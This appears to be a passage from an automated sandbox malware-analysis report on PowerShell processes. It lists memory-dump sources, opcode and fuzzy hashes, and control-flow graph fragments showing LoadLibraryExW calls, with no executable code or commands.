                                                                                                                          • Instruction Fuzzy Hash: FD129470A08A4D8FEBA4DF28CC557F93BD1FF59310F44827AD84DC7291CA78A9459B81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7c2032c3da01c6fff2e29e370795957443cde6f074aa50c8e7d4a5068d26db3b
                                                                                                                          • Instruction ID: bff7d748bc27eea8c9e3ce27817e81f6cf42047c260d6baa00723b0497684a76
                                                                                                                          • Opcode Fuzzy Hash: 7c2032c3da01c6fff2e29e370795957443cde6f074aa50c8e7d4a5068d26db3b
                                                                                                                          • Instruction Fuzzy Hash: CA029670608A4D8FEBA4DF28CCA57F97BD1FF55310F44823AD84DC7291DAB8A9448B81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 02bbea4700b837fc355dfc5082280729b5dbe7a4909bb758a4469015679c1e6f
                                                                                                                          • Instruction ID: 57863637750abc8ebb08989b3c01ef1a403f6bfd586144269462694487549669
                                                                                                                          • Opcode Fuzzy Hash: 02bbea4700b837fc355dfc5082280729b5dbe7a4909bb758a4469015679c1e6f
                                                                                                                          • Instruction Fuzzy Hash: 1AE11632B0DB8A4FEB95DB1888A56B47BE1FF5A710B1801BED54DC7293DE29AC05C341
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1cfe02ec0181788135e46d913ad6f6b500a5ebe683c888e75d57964a6ac40a6a
                                                                                                                          • Instruction ID: 1fe4968dcf87390800686c6aef643727c4038da15b344a01e27796a8e34ff027
                                                                                                                          • Opcode Fuzzy Hash: 1cfe02ec0181788135e46d913ad6f6b500a5ebe683c888e75d57964a6ac40a6a
                                                                                                                          • Instruction Fuzzy Hash: 45D1F431B1DA494FEBE4DB1D88A86B577E1EF5A310B1801BED54DC32A2DE29EC41C741
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2e1ec52dda7c00343d1e7f12e71e8f34d704b94f140fed623e44e6cb99079b31
                                                                                                                          • Instruction ID: 3a5d0040072de47ef1dc90d335de50e6c218fba4d3b259a60d3b00a1ce50bacc
                                                                                                                          • Opcode Fuzzy Hash: 2e1ec52dda7c00343d1e7f12e71e8f34d704b94f140fed623e44e6cb99079b31
                                                                                                                          • Instruction Fuzzy Hash: ACD19670608A8D8FEB68DF28C8557F93BD1EF56310F44817AD84DC7292DA78A945CBC1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2f87b512d03d1c9b866a6506a6780d1f29f2ba1f810b775c7963ada0d9a33160
                                                                                                                          • Instruction ID: b17aba7e3b1f8b896113b1207e2294bd56f2e14961c6611c243e8f660d7b07fd
                                                                                                                          • Opcode Fuzzy Hash: 2f87b512d03d1c9b866a6506a6780d1f29f2ba1f810b775c7963ada0d9a33160
                                                                                                                          • Instruction Fuzzy Hash: 35A1F132F0DA8A4FEB94DB1884A567877E1FF5A714F5801BAD60DC7292DE29AC028740
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c419cfe351971fca4b9b2fc0c3703df4e742baa720ea42a5adaa30e33c14f35f
                                                                                                                          • Instruction ID: e32cb176a347faff11df36d342f742c6fd2f8878cecf44ffbd74513923be629d
                                                                                                                          • Opcode Fuzzy Hash: c419cfe351971fca4b9b2fc0c3703df4e742baa720ea42a5adaa30e33c14f35f
                                                                                                                          • Instruction Fuzzy Hash: 98A11071B1DB4A4FE7E4DB1988A867477E2EF6A300F5800BAD54DC72A2DA29EC41C740
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f275d3b05c4d7297d8ba85196475849eca6b1e9b580c99f29ad8367388d09508
                                                                                                                          • Instruction ID: 91405d60b8b16206cf79fd655bd5954df60d6df2bab7eee68601cc40672999aa
                                                                                                                          • Opcode Fuzzy Hash: f275d3b05c4d7297d8ba85196475849eca6b1e9b580c99f29ad8367388d09508
                                                                                                                          • Instruction Fuzzy Hash: EA91F171B19A4A4FEBE4DF1988E867477E2FF5A304B5800BAD50DC72A2DE29EC41D740
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 324abd7c362ad61a02fa684ca6f1d7b1912b615b38081ce699cca75b42c90fb3
                                                                                                                          • Instruction ID: 12adb1a12c0c8e200011cdfd51146ffbdd9513846b85c01b8c2bce95cc943356
                                                                                                                          • Opcode Fuzzy Hash: 324abd7c362ad61a02fa684ca6f1d7b1912b615b38081ce699cca75b42c90fb3
                                                                                                                          • Instruction Fuzzy Hash: 8351E271B1CB898FE798EB6888A66BC77D1FF49305F050179D44ED3292CE69BC018781
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a03687906cd5b555dbe900a7e8833aebecca63ecdfa2b49573e15b00ca8b8612
                                                                                                                          • Instruction ID: 3b9f09f8a7e3b80399057f8a638b858025c5df18837d6ccb3ef7541d30bb1ab6
                                                                                                                          • Opcode Fuzzy Hash: a03687906cd5b555dbe900a7e8833aebecca63ecdfa2b49573e15b00ca8b8612
                                                                                                                          • Instruction Fuzzy Hash: 40315C70A1864ECEFBB4AF18CDAABF93691FF42354F808138D50DC6092DA7C7945CA41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8ab2411f7fee7c699071adbe43e86479c5e5a9cd50ca5ab17d7733d0fac24562
                                                                                                                          • Instruction ID: 8be0697e7ee98044f30b148c3955dee9a0950d4dc2a3f1de17246de490d77c27
                                                                                                                          • Opcode Fuzzy Hash: 8ab2411f7fee7c699071adbe43e86479c5e5a9cd50ca5ab17d7733d0fac24562
                                                                                                                          • Instruction Fuzzy Hash: 440104D454E2C19ED79353386C715B27FE88F8323670845EBD4D8D90A3D80C2846C393
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                          • Instruction ID: 2cc47b0ba0fdde9b7c4ba52e5ec4494637230a7301f5fb9479e41aed1cd45b64
                                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                          • Instruction Fuzzy Hash: 6D01677121CB0C8FD754EF0CE451AB5B7E0FB95364F50056DE58AC3691DA36E882CB45
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: N_^$N_^$N_^$N_^
                                                                                                                          • API String ID: 0-3900292545
                                                                                                                          • Opcode ID: 595e3e9247a018536dc53557bf11fea0e4389b8df65c94229a711a1d141b6027
                                                                                                                          • Instruction ID: 310bd81dcea0b9a33eb726a6b6fa8d7236035a304ce32bdea09f5b967fc36f58
                                                                                                                          • Opcode Fuzzy Hash: 595e3e9247a018536dc53557bf11fea0e4389b8df65c94229a711a1d141b6027
                                                                                                                          • Instruction Fuzzy Hash: 5D3192E2A0D7C2AFEB1346284CF60E53FD5AF1336870900E6CA84CA043EE5C6817A653

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:3.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:3
                                                                                                                          Total number of Limit Nodes:0
                                                                                                                          execution_graph 8107 7ffd34786c34 8108 7ffd34786c3d LoadLibraryExW 8107->8108 8110 7ffd34786ced 8108->8110

                                                                                                                          Control-flow Graph

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.2863320233.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 1B_L
                                                                                                                          • API String ID: 0-1485067606
                                                                                                                          • Opcode ID: 66b94a4aef5b69f946b35f0f6a03f99a5a2b8af23ab9659917bee602c84ad3e4
                                                                                                                          • Instruction ID: 699b73b269ea8b3c4f9563952e0fbdb314c456d7ac2017631003cad0eaf75728
                                                                                                                          • Opcode Fuzzy Hash: 66b94a4aef5b69f946b35f0f6a03f99a5a2b8af23ab9659917bee602c84ad3e4
                                                                                                                          • Instruction Fuzzy Hash: 8FC1F621B0DB894FDB96DB2C84A59667BE1EF6B30070901FFC449CB2A3D918EC46C781

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.2862189293.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: aac15d20e588f5bea19f6bf349e68306661da93aae73250305654e576d32553c
                                                                                                                          • Instruction ID: 16497e5323246ee81c304eae2254512d3f635f9d24d79e2c2ef596187d4cf35f
                                                                                                                          • Opcode Fuzzy Hash: aac15d20e588f5bea19f6bf349e68306661da93aae73250305654e576d32553c
                                                                                                                          • Instruction Fuzzy Hash: 4B31F331A0CA5C9FDB59DB989889AE9BBE0FF66321F04422FD009D3152CB74A416CB91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 57 7ffd3478664a-7ffd34786caf 60 7ffd34786cb1-7ffd34786cb6 57->60 61 7ffd34786cb9-7ffd34786ceb LoadLibraryExW 57->61 60->61 62 7ffd34786cf3-7ffd34786d1a 61->62 63 7ffd34786ced 61->63 63->62
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.2862189293.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: e1cd944082cd141e1d266809dbb9d3cbda8218ad34637e04808e4d06954d2577
                                                                                                                          • Instruction ID: 94b4a425beaa25ac093ca19655442d7053b60f23d420d56c31949c688181338a
                                                                                                                          • Opcode Fuzzy Hash: e1cd944082cd141e1d266809dbb9d3cbda8218ad34637e04808e4d06954d2577
                                                                                                                          • Instruction Fuzzy Hash: 97217E71A08A1C9FDB58DF989449AE9BBE0FB69321F00822ED00AD3651DB74A4558B81

                                                                                                                          Control-flow Graph

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.2863320233.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 1B_L
                                                                                                                          • API String ID: 0-1485067606
                                                                                                                          • Opcode ID: 6d89d365a11060a2e4af0f60959ea8bdc9abaef75baf3d65781ea344e9c23e58
                                                                                                                          • Instruction ID: 4c17198228a67b1dfda333a2c86d8a022b63f1076588100a4a93e95a398fe0b3
                                                                                                                          • Opcode Fuzzy Hash: 6d89d365a11060a2e4af0f60959ea8bdc9abaef75baf3d65781ea344e9c23e58
                                                                                                                          • Instruction Fuzzy Hash: 2471F431B1DA494FDB99DB1C84A593677E2EFAB30070501BED449CB2A2D925FC82C781

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 391 7ffd348435ee-7ffd348435fb 392 7ffd348435fd-7ffd34843607 391->392 393 7ffd3484360b 391->393 394 7ffd34843627-7ffd34843656 392->394 395 7ffd34843609 392->395 396 7ffd34843610-7ffd34843625 393->396 401 7ffd3484365d-7ffd3484366f 394->401 395->396 396->394
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.2863320233.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f4082206adade73d9740d3a455d6f85c9dbdba53bff52398e86399451c4e1501
                                                                                                                          • Instruction ID: a556a0a5dce4a4fd7ac130306ad8fe51b14456c27799e44431672016799ac021
                                                                                                                          • Opcode Fuzzy Hash: f4082206adade73d9740d3a455d6f85c9dbdba53bff52398e86399451c4e1501
                                                                                                                          • Instruction Fuzzy Hash: B1110632B0D68A4FEB91DB9884A45B87BE1EF5A310F4440BFC54ED7383DA28A845D351